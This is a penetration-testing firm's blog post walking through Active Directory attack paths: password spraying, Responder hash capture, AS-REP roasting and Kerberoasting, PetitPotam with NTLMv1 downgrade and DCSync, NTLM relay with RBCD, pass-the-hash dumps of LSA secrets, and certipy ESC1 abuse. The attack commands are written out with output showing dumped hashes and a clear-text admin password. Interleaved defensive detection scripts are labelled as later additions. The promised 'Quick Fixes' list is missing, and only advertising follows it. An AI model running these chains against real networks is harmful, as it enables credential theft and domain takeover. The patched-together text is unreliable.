2022 Common Active Directory Exploitation Paths

Here are the common exploitation paths we discovered during our internal penetration tests in 2022. These paths are not as complicated as the ones you might find in CTF challenges, but they come from real engagements. The purpose of this blog post is not to explain how the vulnerabilities work; there is plenty of documentation online. Instead, we just want to share the exploitation paths we used most frequently in 2022.

We also like these exploitation paths because they work mostly at the network level, so they are less likely to be affected by local protections like antivirus, which typically block in-memory attacks such as dumping LSASS.

Hope you find them interesting.

Domain Admins

From Unauthenticated To Authenticated

Track 1 – SMB Null + Password Spray

Use Nmap's smb-enum-users script or enum4linux-ng to enumerate users on systems that allow SMB logins via a NULL session.

$ python3 enum4linux-ng.py host1.domain.local
[+] After merging user results we have 563 user(s) total:
'10002':
  username: user1
'10015':
  username: user2

Then run a password spray attack with CrackMapExec or Hydra against the domain controllers using common passwords (be careful about account lockout).

$ crackmapexec smb DC01.domain.local -u users.txt -p 'Password1'

Track 2 – LLMNR / NBT-NS / mDNS protocols

Use Responder to capture domain hashes via the LLMNR, NBT-NS and mDNS protocols. Crack the hashes or relay them to other systems in the network where the user is a local administrator (see the next section for relaying hashes).

$ python3 responder.py -I eth0

Track 3 – AS-REP Roast

Grab a list of users, for example from an SMB NULL session or simply by looking at LinkedIn, and execute an "AS-REP Roast" attack:

$ python3 GetNPUsers.py domain.local/ -userfile usernames.txt -format john -outputfile ASREP_hashes.txt -dc-ip 10.20.0.1

Then crack the hashes with John or Hashcat.

$ john ASREP_hashes.txt --format=krb5asrep -w=rockyou.txt
$ hashcat -m 18200 ASREP_hashes.txt -a 0 rockyou.txt

Track 4 – PetitPotam + NTLMv1 Downgrade + DCSync

Use PetitPotam to force the domain controller to authenticate to your system (10.10.10.5).

$ python PetitPotam.py 10.10.10.5 DC01.local
[+] Trying pipe lsarpc
[-] Connecting to ncacn_np: DC1.local [\PIPE\lsarpc]
[+] Connected!
[+] Binding to c68**********************e
[+] Successfully bound!
[-] Sending EfsRpcOpenFileRaw!
[+] Got expected ERROR_BAD_NETPATH exception!!
[+] Attack worked!!


Then use Responder to downgrade the authentication to NTLMv1. Remember to configure the challenge as 1122334455667788:

$ responder -I eth0 -v --lm
[+] Listening for events...
[SMB] NTLMv1 Client : 10.10.10.5
[SMB] NTLMv1 Username : DOMAIN\DC01$
[SMB] NTLMv1 Hash : DC01$::DOMAIN:5AD73B2********************5346D61:4AC73B5******************************5576C62:1122334455667788


Use crack.sh to crack the NTLMv1 hash. Domain controller computer accounts have DCSync privileges, so you can use the recovered NT hash of the computer account to perform a DCSync attack:

$ crackmapexec smb DC01 -u DC01$ -H a1*****************d3 --ntds
[*] Windows Server 2008 R2 Standard 7601 Service Pack 1 x64 (name: DC01)
[+] Dumping the NTDS...
domain.loca\Administrator:500:aad3b435b51404eeaad3b435b51404ee:3e24ddead35464cd4396c6482c673f4a5:::
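
The two tracks above are shown from the attacker's side; as an added example (not code from the original post), here is detection logic a defender can run over Security-log records: the many-accounts-from-one-source pattern that Track 1's password spray leaves in event 4625, and NTLMv1 logons in event 4624, whose presence means the downgrade used in Track 4 is still possible. The event records are constructed samples using the 4624/4625 EventData field names.

```python
from collections import defaultdict
from datetime import datetime, timedelta

SPRAY_MIN_ACCOUNTS = 5                  # distinct accounts failing from one source IP ...
SPRAY_WINDOW = timedelta(minutes=10)    # ... within this window

def detect_password_spray(events, min_accounts=SPRAY_MIN_ACCOUNTS, window=SPRAY_WINDOW):
    """Return {source_ip: sorted accounts} for sources whose 4625 failures hit many
    distinct accounts inside the window: the footprint of Track 1's password spray."""
    per_ip = defaultdict(list)
    for e in events:
        if e["EventID"] == 4625:
            per_ip[e["IpAddress"]].append((e["Time"], e["TargetUserName"].lower()))
    hits = {}
    for ip, fails in per_ip.items():
        fails.sort()                    # slide a window over the failures in time order
        for i, (t0, _) in enumerate(fails):
            users = {u for t, u in fails[i:] if t - t0 <= window}
            if len(users) >= min_accounts:
                hits[ip] = sorted(users)
                break
    return hits

def detect_ntlmv1(events):
    """Return [(source_ip, account)] for 4624 logons completed with NTLMv1 or LM.
    Any hit means clients may still fall back to NTLMv1, which is what Track 4's
    Responder downgrade relies on; LmCompatibilityLevel 5 removes that option."""
    return [(e["IpAddress"], e["TargetUserName"]) for e in events
            if e["EventID"] == 4624 and e.get("AuthenticationPackageName") == "NTLM"
            and e.get("LmPackageName") in ("NTLM V1", "LM")]

# Constructed sample records (field names follow the EventData of 4624/4625).
T0 = datetime(2022, 11, 3, 9, 0, 0)

def ev(event_id, secs, user, ip, **extra):
    rec = {"EventID": event_id, "Time": T0 + timedelta(seconds=secs),
           "TargetUserName": user, "IpAddress": ip}
    rec.update(extra)
    return rec

SAMPLE_EVENTS = (
    [ev(4625, 3 * i, "user%d" % i, "10.10.10.5") for i in range(1, 9)]          # 8 accounts in 24 s
    + [ev(4625, 0, "alice", "10.20.0.40"), ev(4625, 5, "alice", "10.20.0.40")]  # one user mistyping
    + [ev(4624, 30, "DC01$", "10.20.0.1", AuthenticationPackageName="NTLM", LmPackageName="NTLM V1"),
       ev(4624, 31, "bob", "10.20.0.41", AuthenticationPackageName="NTLM", LmPackageName="NTLM V2"),
       ev(4624, 32, "carol", "10.20.0.42", AuthenticationPackageName="Kerberos", LmPackageName="-")]
)
```

On the sample data, `detect_password_spray` flags only 10.10.10.5 and `detect_ntlmv1` only the DC01$ logon; tune the window and account threshold to your own lockout policy.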

From Domain Users To Domain Admins

Track 1 – NTLM Relay + RBCD

Use PetitPotam, PrinterBug or Coercer to force the domain controller DC01 to authenticate to our machine:

$ python printerbug.py domain.local/user:Password1@DC01 10.10.10.5
[*] Attempting to trigger authentication via rprn RPC at DC01.domain.local
[*] Bind OK
[*] Got handle
[*] Triggered RPC backconnect, this may or may not have worked


Exploit Resource-Based Constrained Delegation (RBCD): the relayed LDAPS session creates a new computer account and sets the "msDS-AllowedToActOnBehalfOfOtherIdentity" attribute on DC01's computer object so that the new account can impersonate users to DC01.

$ ntlmrelayx.py -t ldaps://DC02.domain.local --remove-mic --delegate-access -smb2support
[*] Servers started, waiting for connections
[*] Connection from DOMAIN.LOCAL/DC01$@10.20.0.1 controlled, attacking target ldaps://DC02.domain.local
[*] Authenticating against ldaps://DC02.domain.local as DOMAIN.LOCAL/DC01$ SUCCEED
[*] Enumerating relayed user's privileges. This may take a while on large domains
[*] Adding new computer with username: LDTWODIEP$ and password: 20D0-d=30%^d7g result: OK
[*] Delegation rights modified successfully!
[*] LDTWODIEP$ can now impersonate users on DC01$ via S4U2Proxy


Then request a Kerberos service ticket while impersonating the administrator:

$ getST.py -spn cifs/DC02.domain.local domain.local/LDTWODIEP$ -impersonate administrator -dc-ip 10.20.0.2
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache


Finally load the ticket and use it against the domain controller:

$ export KRB5CCNAME=administrator.ccache
$ impacket-wmiexec domain.local/administrator@DC02.domain.local -k
[!] Launching semi-interactive shell
[!] Press help for extra shell commands
C:\>whoami
domain.local\administrator

Track 2 – NTLM Relay + Local Admin + LSA Secrets

Use Responder together with ntlmrelayx to relay the captured authentication to systems where the relayed account is a local administrator. Remember to disable SMB in Responder's configuration file, since ntlmrelayx needs to listen on that port.

$ python3 responder.py -I eth0
$ ntlmrelayx -tf targets.txt -smb2support
[*] Authenticating against smb://10.20.0.3 as domain.com\administrator SUCCEED
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
administrator:500:aad3b435b51404eeaad3b435b51404ee:3e24ddead35464cd4396c6482c673f4a5:::


Use a Pass-the-Hash attack to dump the LSA secrets and find domain administrator credentials in clear text:

$ crackmapexec smb 10.20.0.3 -u Administrator -H 3e24dcaad25464ce4297d6482c576f4a7 --lsa
SMB 10.20.0.3 445 LOCAL-CA domain.local\administrator:DomainAdminPass1234!

Track 3 – Kerberoasting

Use Rubeus or GetUserSPNs to perform a Kerberoast attack:

$ GetUserSPNs.py -request -dc-ip 10.20.0.1 domain.local/user1 -outputfile kerberoast_hashes.txt

Then crack the hashes with John or Hashcat:

$ john --format=krb5tgs -w=rockyou.txt kerberoast_hashes.txt
$ hashcat -m 13100 --force -a 0 kerberoast_hashes.txt rockyou.txt
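
Both roasting tracks (AS-REP Roast in the first section and Kerberoasting here) depend on attributes a defender can audit directly. As an added example, not code from the original post or from the tools it uses, the Python below checks user objects for the DONT_REQ_PREAUTH flag and for SPNs on non-machine accounts, noting whether RC4 tickets are still allowed; the user records are a constructed sample of what an LDAP search for these attributes returns.

```python
from dataclasses import dataclass, field

UF_ACCOUNTDISABLE = 0x0002
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_DONT_REQUIRE_PREAUTH = 0x400000   # the userAccountControl bit behind AS-REP roasting
ETYPE_RC4_HMAC = 0x4                 # msDS-SupportedEncryptionTypes bit for RC4

@dataclass
class AdUser:
    sam: str
    uac: int                         # userAccountControl
    spns: list = field(default_factory=list)   # servicePrincipalName values
    enc_types: int = 0               # msDS-SupportedEncryptionTypes; 0 = attribute absent

def audit_users(users):
    """Return {sAMAccountName: [finding, ...]} for enabled accounts that a roasting
    attack would target; machine accounts are skipped (their passwords are random)."""
    findings = {}
    for u in users:
        if u.uac & UF_ACCOUNTDISABLE:
            continue                 # disabled accounts are not roastable
        issues = []
        if u.uac & UF_DONT_REQUIRE_PREAUTH:
            issues.append("asrep-roastable: DONT_REQ_PREAUTH set")
        is_machine = u.sam.endswith("$") or bool(u.uac & UF_WORKSTATION_TRUST_ACCOUNT)
        if u.spns and not is_machine:
            # An absent attribute falls back to the domain default, which still permits RC4
            # unless it was hardened; RC4 tickets are the ones that crack quickly.
            rc4 = u.enc_types == 0 or bool(u.enc_types & ETYPE_RC4_HMAC)
            issues.append("kerberoastable: SPN on user account, %s"
                          % ("RC4 allowed" if rc4 else "AES only"))
        if issues:
            findings[u.sam] = issues
    return findings

# Constructed sample directory: what an LDAP search for the four attributes might return.
SAMPLE_USERS = [
    AdUser("svc_sql", 0x10200, spns=["MSSQLSvc/sql01.domain.local:1433"]),         # RC4 default
    AdUser("svc_web", 0x10200, spns=["HTTP/web01.domain.local"], enc_types=0x18),  # AES only
    AdUser("user1", 0x400200),                                                     # no pre-auth
    AdUser("svc_old", 0x10202, spns=["HTTP/old01.domain.local"]),                  # disabled
    AdUser("DC01$", 0x82000, spns=["ldap/DC01.domain.local"]),                     # machine account
    AdUser("user2", 0x200),                                                        # clean
]
```

Accounts flagged "RC4 allowed" are the ones to move to AES-only (or to group managed service accounts); the pre-auth finding is fixed by clearing the flag on the account.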

Track 4 – Active Directory Certificate Service Exploitation

There are a number of exploitation paths affecting Active Directory Certificate Services (AD CS). A common one is ESC1. The following command requests a certificate for the administrator account through a vulnerable template:

$ certipy req -u user@domain.local -p 'Password1' -target CA.domain.local -ca DOMAIN-CA -template VulnTemplate -upn 'administrator@domain.local' -dns DC01.domain.local
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 226
[*] Got certificate with multiple identifications
UPN: 'administrator@domain.local'
DNS Host Name: 'DC01.domain.local'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator_dc01.pfx'


The certificate can be used to authenticate to the domain controller at 10.20.0.1 and request a Ticket Granting Ticket (TGT); certipy then retrieves the NT hash of the domain administrator:

$ certipy auth -pfx administrator_dc01.pfx -dc-ip 10.20.0.1
Certipy v4.0.0 - by Oliver Lyak (ly4k)
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'administrator@domain.local'
[1] DNS Host Name: 'DC01.domain.local'
[*] Using principal: administrator@domain.local
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@domain.local':
aad3b435b51404eeaad3b435b51404ee:3e24ddead35464cd4396c6482c673f4a5

Finally, use the NT hash of the domain administrator to connect to the domain controller DC01 via Pass-the-Hash, as shown earlier.
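
As an added example (not code from the original post or from certipy), the Python below audits certificate templates for the combination of settings that makes ESC1 possible, so templates like the one requested above can be found before someone else does. The template records, the "published" field and the SID domain part are constructed placeholders.

```python
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1   # msPKI-Certificate-Name-Flag: requester sets the SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: CA manager approval required

# EKUs that let a certificate be used for domain logon (no EKU at all also qualifies)
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}
WELL_KNOWN_LOW_PRIV = {"S-1-1-0", "S-1-5-11", "S-1-5-32-545"}   # Everyone, Authenticated Users, Users

def is_low_priv(sid):
    # Domain Users (RID 513) and Domain Computers (RID 515) count as low-privileged too
    return sid in WELL_KNOWN_LOW_PRIV or sid.endswith("-513") or sid.endswith("-515")

def esc1_findings(template):
    """Return the ESC1 conditions a published template meets, or [] if any is missing."""
    if not template["published"]:
        return []
    ekus = set(template["ekus"])
    checks = [
        (template["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
         "requester supplies the subject / SAN"),
        (not ekus or ekus & AUTH_EKUS, "EKU allows domain authentication"),
        (not template["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS, "no manager approval"),
        (template["authorized_signatures"] == 0, "no authorized signature required"),
        (any(is_low_priv(s) for s in template["enroll_sids"]), "low-privileged enrollment rights"),
    ]
    return [why for ok, why in checks] if all(ok for ok, _ in checks) else []

def audit_esc1(templates):
    return {t["name"]: esc1_findings(t) for t in templates if esc1_findings(t)}

# Constructed templates; "VulnTemplate" mirrors the one requested with certipy above.
DOM = "S-1-5-21-1111111111-2222222222-3333333333"   # placeholder domain SID
SAMPLE_TEMPLATES = [
    {"name": "VulnTemplate", "published": True, "name_flag": 0x1, "enrollment_flag": 0x0,
     "authorized_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll_sids": [DOM + "-513"]},
    {"name": "User", "published": True, "name_flag": 0x0, "enrollment_flag": 0x0,       # subject built from AD
     "authorized_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll_sids": [DOM + "-513"]},
    {"name": "WebServer", "published": True, "name_flag": 0x1, "enrollment_flag": 0x0,  # Server Auth EKU only
     "authorized_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.1"], "enroll_sids": [DOM + "-513"]},
    {"name": "Approved", "published": True, "name_flag": 0x1, "enrollment_flag": 0x2,   # needs approval
     "authorized_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"], "enroll_sids": [DOM + "-512"]},
]
```

Removing any one of the five conditions (most simply, clearing the enrollee-supplies-subject flag or requiring manager approval) takes a template out of the ESC1 set.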

Quick Fixes

Proelians recommends implementing the following fixes in order to prevent the exploitation paths described above:

At Proelians, we offer a range of innovative solutions designed to help businesses of all sizes safeguard their data and systems from cyber attacks. Our team of experts is dedicated to staying up-to-date on the latest threats and technologies, and we work closely with our clients to develop customized security strategies that meet their unique needs.

Whether you're looking to secure your network, protect your data, or comply with industry regulations, Proelians has the expertise and resources to help. So if you want to take your cyber security to the next level, don't hesitate to get in touch with us today. We look forward to the opportunity to serve you and help keep your organization safe from cyber threats.
